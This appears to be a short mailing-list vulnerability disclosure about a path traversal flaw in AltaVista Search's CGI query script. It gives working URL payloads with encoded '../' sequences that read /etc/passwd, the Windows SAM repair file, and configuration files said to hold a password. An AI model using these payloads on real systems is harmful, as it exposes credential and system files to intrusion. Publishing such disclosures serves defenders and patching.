hola,

more bugs in the AV-Search thing ..

using uri-encoded strings it is possible to view "any" file on the system ..

examples:

unixxxsss ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd

or on an micro$oft IIS ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._

interesting infos about the file structure ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log

or another file which does contain the password ..

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf

altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.

whatever ....

nicedays :-/

RC
rudicarell@hotmail.com